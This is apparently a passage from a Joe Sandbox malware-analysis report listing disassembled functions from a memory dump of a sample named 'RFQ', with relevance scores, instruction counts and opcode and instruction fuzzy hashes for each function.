                                                                                                        • Instruction ID: bc499805b588ea294d3c1d1e14e358612d6cbdbe21bdd4822729f090fb67f7af
                                                                                                        • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                        • Instruction Fuzzy Hash: 84110436A00915AFDB19CB98CC45B9EBBF5EF84210F058269F955D7340E635AD01CB80
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A30AD0 Relevance: .1, Instructions: 61COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                        • Instruction ID: 1261e746785b5b862af489aad54507e4b04d53696c0dabe1b7182dc011037004
                                                                                                        • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                        • Instruction Fuzzy Hash: 2E2106B5A00B059FD3A0CF29C541B52BBF4FB48B20F10492EE98AC7B40E371E814CB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01ABE7E1 Relevance: .1, Instructions: 59COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                        • Instruction ID: 87cf9c8807574935d39c95759b5fabd9a00ceeb5a01f905e3da006256f7e712b
                                                                                                        • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                        • Instruction Fuzzy Hash: F011C631600A41EFE7329FC9C980BD6BBE9EF45754F058428FA099B162D771DC40D790
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A527ED Relevance: .1, Instructions: 58COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 24fdfa54b835c538a87783b468b0c7fceb16b4127375e5c1d798d914d9e0cd33
                                                                                                        • Instruction ID: 04663471040e2e61aa8babc3f591b62c8c89ff6113d9155558babd900e0fac4f
                                                                                                        • Opcode Fuzzy Hash: 24fdfa54b835c538a87783b468b0c7fceb16b4127375e5c1d798d914d9e0cd33
                                                                                                        • Instruction Fuzzy Hash: 1201D231709685ABE727A3AED984F676BECEF90394F094076FD018B651DA24DC04C2A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A34690 Relevance: .1, Instructions: 57COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b6373b475637e6c3d012c67cae4e80be9638c026fe361613fe9bdb6c7fa19e57
                                                                                                        • Instruction ID: d1be97c924a34061eeb162c06b998f50ce20b84521ea2a72db0a340a23662c74
                                                                                                        • Opcode Fuzzy Hash: b6373b475637e6c3d012c67cae4e80be9638c026fe361613fe9bdb6c7fa19e57
                                                                                                        • Instruction Fuzzy Hash: 0511CE76200645AFDB37CF59D980F567BA8EBCAB64F044119F9048B690C370E800CF60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01B04B00 Relevance: .1, Instructions: 57COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cdff41df32d0f0700ebbcbbc8ad1d3b519cdac6a47a174c37edabb899eb134a6
                                                                                                        • Instruction ID: 34ac844809d22a294013c9b878cf4f3bc41a5413d4ffd57c8502ff19d7a03ad1
                                                                                                        • Opcode Fuzzy Hash: cdff41df32d0f0700ebbcbbc8ad1d3b519cdac6a47a174c37edabb899eb134a6
                                                                                                        • Instruction Fuzzy Hash: 9B110632200A119FD7279A29D940F26BFA5FFC4310F144559EB86C72D0DB30E802C790
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A66620 Relevance: .1, Instructions: 56COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 46a61b090f1e921445f028b13eda2f853ac5d1d78354ba1623c31c6b33c19ee9
                                                                                                        • Instruction ID: 9eb230cfa4458ac1eec74f7b0390b1152695b871d6dfd4e25faa872aaeb29e00
                                                                                                        • Opcode Fuzzy Hash: 46a61b090f1e921445f028b13eda2f853ac5d1d78354ba1623c31c6b33c19ee9
                                                                                                        • Instruction Fuzzy Hash: 0311E576A00716ABDB26EF5DDA80B9EFBBCFF84750F500454EA09A7200D770ED058B90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A5EA2E Relevance: .1, Instructions: 56COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 28ae6d4fbdc2323358c65c912ab33feb4af32a9585a30eadf0923cc9b3a43770
                                                                                                        • Instruction ID: 9a52f4bb121c282376524905163dd6eb9ee01bdc1f954db544d8e5c75467354c
                                                                                                        • Opcode Fuzzy Hash: 28ae6d4fbdc2323358c65c912ab33feb4af32a9585a30eadf0923cc9b3a43770
                                                                                                        • Instruction Fuzzy Hash: 3801DE71504109AFC335DF28D504FA6BBF9EB81315F2081AAE5088B261D770AD86CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A5E53E Relevance: .1, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                        • Instruction ID: 4d73e0b1fda59774a3bb91506fcca893a05ab531c03d42cde1971aa6c276e0dc
                                                                                                        • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                        • Instruction Fuzzy Hash: 8811A57260A6D29FEF63972CC954B257FE4AF41758F1D04A1DE41C7A52F738C982C250
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01ABE75D Relevance: .1, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                        • Instruction ID: e851cd9a1194ff8f6b421134672d6b7a00f3af096d460b786aff22d00269b696
                                                                                                        • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                        • Instruction Fuzzy Hash: A501F572600145AFE7219F58CD80FDBBBADEF80750F058024FA059B262E775DD80C790
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A2A250 Relevance: .1, Instructions: 52COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                        • Instruction ID: b5ea237598875cfa6c8937463a695d6f426f80f195b815d04fa7f08a767adc3c
                                                                                                        • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                        • Instruction Fuzzy Hash: 2D01D6725057329BCB318F1DD840A367BB6EF56760705892DFD958BAA1D735D400CB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01B04940 Relevance: .1, Instructions: 52COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d6703f9553a707c6b722c7f8ca05aaf66bcc65c9bb2b453555ee20943a674b40
                                                                                                        • Instruction ID: 6e4fe9b1109772f7d97f88ee071a33bbd59690a4627b9a0a7486343e6203a0a1
                                                                                                        • Opcode Fuzzy Hash: d6703f9553a707c6b722c7f8ca05aaf66bcc65c9bb2b453555ee20943a674b40
                                                                                                        • Instruction Fuzzy Hash: 00010032441611AFC337DF1C9904E22BBA8EB81370B2642B5EAA89B1E2D730D801CBC0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AAE1D0 Relevance: .1, Instructions: 51COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 845763f9e4277986ea0ccceb900137bb4f3461aa5af7356750c6a7d97d46d7f6
                                                                                                        • Instruction ID: 0d655a3fe5149c069dbe6f6685b0609670490b2f5b590aaa3cae02c3d1c5309c
                                                                                                        • Opcode Fuzzy Hash: 845763f9e4277986ea0ccceb900137bb4f3461aa5af7356750c6a7d97d46d7f6
                                                                                                        • Instruction Fuzzy Hash: C4118E31241241EFDB16EF19CD80F56BBB8FF94B54F140065F9059B661C335ED01CA90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A36259 Relevance: .1, Instructions: 51COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3b0ecbe597337be8f91c046e7d74154c12be70fd1700fdfe4201cc3afad5c7e6
                                                                                                        • Instruction ID: ae97fbbc73c1def3d6b13afc9acfd2e170bb1e4be0398eff755218e33837f931
                                                                                                        • Opcode Fuzzy Hash: 3b0ecbe597337be8f91c046e7d74154c12be70fd1700fdfe4201cc3afad5c7e6
                                                                                                        • Instruction Fuzzy Hash: E1114870941229ABDB65AB64CE42FE9B2B8EF84710F504195A318A60E0DB709E85CF84
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A3208A Relevance: .0, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                        • Instruction ID: a9414733230557105e67e5b26aa461cd84e6e10d65ccd2633bd476c36677ebee
                                                                                                        • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                        • Instruction Fuzzy Hash: 340128322002118FDF15AB2DD880B66B767BFC5710F1944A6FD458F246DA71CC85C390
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AB6050 Relevance: .0, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 931ef178c45637c1c7058b89bc6354bc40d305470923d2fcd2cdbc9c281e1eda
                                                                                                        • Instruction ID: a6905dd8dcd7e049b97a049166edeb50d1efce4ddfdec92e5901968e1fa47eac
                                                                                                        • Opcode Fuzzy Hash: 931ef178c45637c1c7058b89bc6354bc40d305470923d2fcd2cdbc9c281e1eda
                                                                                                        • Instruction Fuzzy Hash: 58112973900019ABCB21DF95CD84DEFBB7CEF48254F044166E906E7211EA34EA15CBE0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AC6500 Relevance: .0, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3596c4264d9214eaae4b19595922c1b06474885472334045b8034e397d5a1dc7
                                                                                                        • Instruction ID: 9e48d1d009a29f2b5b4851b145485d41b8be47bcbe70dad01cfab3eac2579eb8
                                                                                                        • Opcode Fuzzy Hash: 3596c4264d9214eaae4b19595922c1b06474885472334045b8034e397d5a1dc7
                                                                                                        • Instruction Fuzzy Hash: 2B11043264014ADFC311CF68C800BA2BBB9FBAA714F188159E848CB315D732EC80CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01ABC810 Relevance: .0, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2858ccebeb713a43c5d0f5a0969cac6fb2d0ef213c7378ef8da3eb0cba5be7b3
                                                                                                        • Instruction ID: dcdf0af671e5b2963eb88215a45518900eb1a6204cc90b84657a90367d0e7f32
                                                                                                        • Opcode Fuzzy Hash: 2858ccebeb713a43c5d0f5a0969cac6fb2d0ef213c7378ef8da3eb0cba5be7b3
                                                                                                        • Instruction Fuzzy Hash: 631118B1A002599BCB00DFA9D581AAEBBF8FF58250F10806AE905E7351D674EA018BA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01ADEA60 Relevance: .0, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1859cbe77ccccf5d10237a0fd0fa2b35f94bfa18762da25a8db4d8b95130c9a4
                                                                                                        • Instruction ID: 632cf83c25d98287834bbf81c67cdd6ee4523268c9fb1532561ba19ebdd22e28
                                                                                                        • Opcode Fuzzy Hash: 1859cbe77ccccf5d10237a0fd0fa2b35f94bfa18762da25a8db4d8b95130c9a4
                                                                                                        • Instruction Fuzzy Hash: 3701B1321406229BCB36AB29C540E76BBB9FF91692F44446AF5465F221CB249C41CBD2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A720F0 Relevance: .0, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c3f0520251526820a8eac02f9402f480e11dee46d4152d9e33fba76aa9e2ef85
                                                                                                        • Instruction ID: 6fc0c37378f5da6d245ff1abd2469ff1b29a7f897ac83d80ccd2dc905bb99266
                                                                                                        • Opcode Fuzzy Hash: c3f0520251526820a8eac02f9402f480e11dee46d4152d9e33fba76aa9e2ef85
                                                                                                        • Instruction Fuzzy Hash: 18116935A0020DEBDF15EFA4DD50FAE7BB9FB48240F008059E9019B290DB35AE11CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A2C020 Relevance: .0, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                        • Instruction ID: 9e64dc24c68467e1448106d089aa2f6c6ccf2b832547e52cff5641b18c54b19f
                                                                                                        • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                        • Instruction Fuzzy Hash: E00128321007059FEB26A7BDC900EAB77F9FFC5264F04881AEA468B580DE74E401C760
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A6E5CF Relevance: .0, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 06b44fc4a00d321553924c05f4c28ce6b2cbf7155c3ea5219ac8ee64bf70c779
                                                                                                        • Instruction ID: 5ae8c671b3f6c0351f0f0d938cb5f653babe3570ff8a6afd1620f0dc4bd23667
                                                                                                        • Opcode Fuzzy Hash: 06b44fc4a00d321553924c05f4c28ce6b2cbf7155c3ea5219ac8ee64bf70c779
                                                                                                        • Instruction Fuzzy Hash: C601F771201511BFC711BB39CE40F23BBACFF94654B000626B50987551DB74EC05C6E0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AC69C0 Relevance: .0, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7c47b1dffd4edb83ac6db29cadce97a6013bd0ab90f61e977a028862772d011c
                                                                                                        • Instruction ID: 08f2e29e7d27b95402dbebd1522b8f6110f2ebde7b61ccefcb20e5cc2372d8a6
                                                                                                        • Opcode Fuzzy Hash: 7c47b1dffd4edb83ac6db29cadce97a6013bd0ab90f61e977a028862772d011c
                                                                                                        • Instruction Fuzzy Hash: 7001F732224212DBD724DF6EC8889A7BBB8FF98A60F11462DE95D87280E7309905C7D1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01ABC460 Relevance: .0, Instructions: 48COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43609845ba0b56cb8726cc3032d061351f3b74c390aed6c055888684520400df
                                                                                                        • Instruction ID: 38150c7f45e328fd9180a30a73c7e4a3cd485d3c61bd838c3c180778cc62ea9d
                                                                                                        • Opcode Fuzzy Hash: 43609845ba0b56cb8726cc3032d061351f3b74c390aed6c055888684520400df
                                                                                                        • Instruction Fuzzy Hash: 87115B71A00249EBDB15EF68C984EEE7BB9EB48250F004059F90197346DA39EE11DB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01ABC97C Relevance: .0, Instructions: 48COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9fb52e1af68f2b73805c22fdd6d73e1791601071e21c87b6ec3b6b0de387f3ac
                                                                                                        • Instruction ID: 564ba076c8ae25c247111704143d2e0a22b7155b4fe837de35e3dc878c53825e
                                                                                                        • Opcode Fuzzy Hash: 9fb52e1af68f2b73805c22fdd6d73e1791601071e21c87b6ec3b6b0de387f3ac
                                                                                                        • Instruction Fuzzy Hash: 771139B16183499FC710DF69D98199BBBF8FF98710F00891AF998D7395E630E901CB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01B04A80 Relevance: .0, Instructions: 48COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                        • Instruction ID: ac586e0cb3919ab4c7fd5b254a4027cbcf2243b3d092c2e46275cc143785867f
                                                                                                        • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                        • Instruction Fuzzy Hash: CC01D8322046019FDB2A9AA9D844F57BFE6FFC5310F044859EB438B690DB70F880C754
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01ABCA11 Relevance: .0, Instructions: 48COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fc9a04727facad66a2740270c990a2c37c00dee3f6e4fc1f53cec8d59a10dcfd
                                                                                                        • Instruction ID: 47bd3a7524813d94df4a6bb9993324b44c2892112ea0f9561a6cdfd43b6212f5
                                                                                                        • Opcode Fuzzy Hash: fc9a04727facad66a2740270c990a2c37c00dee3f6e4fc1f53cec8d59a10dcfd
                                                                                                        • Instruction Fuzzy Hash: AF115A716043049FC710DF69C98195BBBE8BF99350F00851EF958D7355E630E9008B92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A4E016 Relevance: .0, Instructions: 46COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                        • Instruction ID: 54530651306aa5da5c5a510399863b68c77f6f5504043d4421f23c142fe60190
                                                                                                        • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                        • Instruction Fuzzy Hash: 2A015632240A809FE322971DCA48F777BE8FFC5764F0D44A5E915CBAA2D628DC40C621
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A2826B Relevance: .0, Instructions: 46COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
